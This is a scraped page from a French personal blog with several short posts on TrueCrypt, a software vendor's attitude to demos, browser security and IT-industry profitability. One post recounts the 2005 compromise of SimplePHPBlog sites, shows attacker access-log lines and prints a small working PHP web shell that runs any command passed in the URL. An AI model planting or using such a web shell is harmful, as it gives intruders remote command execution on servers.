Warning: strpos(): needle is not a string or an integer in /home/users/p/pbajoit/www/phil-sphpblog/index.php on line 41

Warning: strpos(): needle is not a string or an integer in /home/users/p/pbajoit/www/phil-sphpblog/index.php on line 48

Warning: strpos(): needle is not a string or an integer in /home/users/p/pbajoit/www/phil-sphpblog/index.php on line 55

Warning: strpos(): needle is not a string or an integer in /home/users/p/pbajoit/www/phil-sphpblog/index.php on line 61
Mon Blog, ça vient - Tabac: pas encore assez
 

Un bel outil 


TrueCrypt est un système qui crée et met à jour un volume encrypté à la volée (un fichier, ou un périphérique comme une disque USB). Cela signifie que les données sont automatiquement encryptées ou décryptées juste avant d'être écrites ou lues, sans intervention de l'utilisateur.

Aucune donnée ne peut être lue sans que le volume soit activé avec le mot de passe correct.

TrueCrypt utilise les algorithmes Twofish , Blowfish, CAST5, Serpent, AES et jusqu'à 3 de leurs combinaisons (par exemple Twofish-Serpent).
Les versions disponibles tournent sous Windows et Linux.

Pour les gens méfiants, il faut savoir qu'un volume TrueCrypt n'est pas reconnaissable (par exemple un volume sur disque USB ressemble à un disque non formatté) et que de plus, il est possible de placer un volume caché à l'intérieur d'un volume anodin (pour ceux qui donneraient leur mot de passe sous la menace) ...

TrueCrypt est un projet open-source hébergé par SourceForge.
( 595 lectures )   |  permalien ( 3.1 / 1096 )
Ca c'est de la belle marchandise monsieur! 

Une suggestion d'un vendeur de logiciels à qui une démonstration est demandée:
Let's not built a demo/technical proof.
This is time-consuming and does most of the times not require buy-in from the customer.
Let's convince them on logical differentiators.
I suggest that you contact the responsible pre-sales engineer <snip> in order to provide you with logical, convincing ammunition.
Certain qu'avec des munitions pareilles, le secteur va sortir de l'artisanat ...
( 510 lectures )   |  permalien ( 3 / 898 )
Une grosse faille de sécurité de SimplePHPBlog 

La faille

Une faille de sécurité connue a été utilisée contre le site principal de SimplePHPBlog le 3 septembre 2005.
Ensuite un grand nombre de blogs utilisant SimplePHPBlog ont été piratés dans les jours suivants (ce qui se traduit ici par ce message à conserver en souvenir).

Les visiteurs venus d'ailleurs

Deux visites, le 4 septembre puis le 7 septembre:
weblog.bajoit.net 82.231.77.60 - - [04/Sep/2005:03:20:10 +0200] "GET /install00.php HTTP/1.1" 200 9355
weblog.bajoit.net 213.240.239.4 - - [07/Sep/2005:23:03:30 +0200] "GET /install00.php HTTP/1.1" 200 9388

Comment ça marche?

Une première faille permettait d'effacer un fichier créé lors de l'installation, de manière à forcer une nouvelle exécution des scripts d'installation. Il était alors possible de créer un nouvel utilisateur qui pouvait par exemple ajouter un message (ou pire).

Une seconde faille permettait d'importer (en tant que nouveau gestionnaire) comme image un fichier exécutable, qui pouvait à son tour accéder au serveur via PHP.

Un bon exemple:
<?php
$cmd = $_GET['cmd'];
echo '<hr/><pre>';
echo 'Command: ' . $cmd;
echo '</pre><hr/><br>';

echo '<pre>';
$last_line = system($cmd,$output);
echo '</pre><hr/>';
?>.
Mais dans ce cas précis, les commandes PHP trop dangereuses sont désactivées chez PHPNET.

Pourquoi?

Beaucoup d'utilisateurs se demandent ou est le problème: qualité, open-source, système basé sur des fichiers texte?
En tout cas, la publication de la faille a beaucoup aidé les pirates, et malgré tout il vaut mieux publier les failles que de les garder secrètes.
Et une version corrigée 4 jours après le problème ce n'est pas aussi bien que Mozilla (qui a été capable de publier la version résistante à une faille en moins de 24 heures) mais ce n'est pas mal!
( 934 lectures )   |  permalien ( 3.2 / 823 )
hmm... 


WTF? that's just a hack.
( 555 lectures )   |  permalien ( 3.1 / 831 )
Qui est secure? 

La meilleure signification

Dans cette discussion de Michal Zalewski à propos de l'évaluation des différents navigateurs disponibles, on peut voir un beau mélange de significations du mot anglais secure :
  • sécurisé : le navigateur a une architecture dans laquelle la sécurité est un aspect extrêmement important, il ne va pas divulguer des informations confidentielles à l'insu de l'utilisateur, il ne va pas exécuter des programmes non désirés par l'utilisateur, il va encourager les bonnes pratiques en matière de sécurité,
  • fiable : le navigateur ne comporte pas trop de bugs, bloquants ou non bloquants,
  • fiable dans des conditions extrêmes : ne se bloque pas sur des cas qui se trouvent en dehors des conditions habituelles ('tiny, razor-sharp shards of malformed HTML').

Sur la base de ce dernier point (et passant sous silence ses mauvaises prestations pour les deux premiers), Internet Explorer est présenté comme bien plus secure que ses concurrents : un peu léger ...


( 699 lectures )   |  permalien ( 3 / 1340 )
Agoria et les normes 

Trop cher

Avec comme arguments principaux une faible rentabilité et le coût du travail moins élevés chez les voisins, Agoria, la fédération multisectorielle de l'industrie technologique, qualifie de décevants les derniers accords interprofessionnels.

Mauvaise piste

Pas très nettes ces excuses: je vois par contre d'autres raisons fondamentales pour cette faible rentabilité, du moins dans le domaine des services informatiques:
  • Prises de risques : Plus que jamais, les entreprises de services acceptent des projets au forfait dans des conditions de visibilité technologique et métier trop peu maîtrisées,
  • Flexibilité : Pas de commande extraordinaire ou d'inventaire saisonnier dans ce secteur: simplement des projets qui dérapent et des promesses trop rapides. Reste une seule solution: heures supplémentaires, si possible discrètement, sans concertation ni publicité. Avec un peu de chance, l'employé ne les déclarera même pas, sinon on peut toujours corriger son détail de prestations par après.
  • Les vrais concurrents : La concurrence ne vient pas d'Allemagne ou de France, elle est en Belgique, avec les mêmes normes. Les offres comportant des développement à moindre coût (Espagne, Grèce, Inde) ne montrent pas un taux de rentabilité bien élevé, surtout quand on recommence le projet ... en Belgique.
  • Gestion du personnel : Des managers connaissant le domaine et tenant leurs promesses: rien de plus pour motiver son personnel. Quant aux stages de développement personnel ou psychothérapies sauvages, c'est bon, au second degré, pour entendre ses collègues les plus réceptifs adopter un vocabulaire psy pendant quelques mois.

Alors, 2005, meilleur ou pire que 2004?
( 740 lectures )   |  permalien ( 3 / 1277 )

<< <Précédent | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 |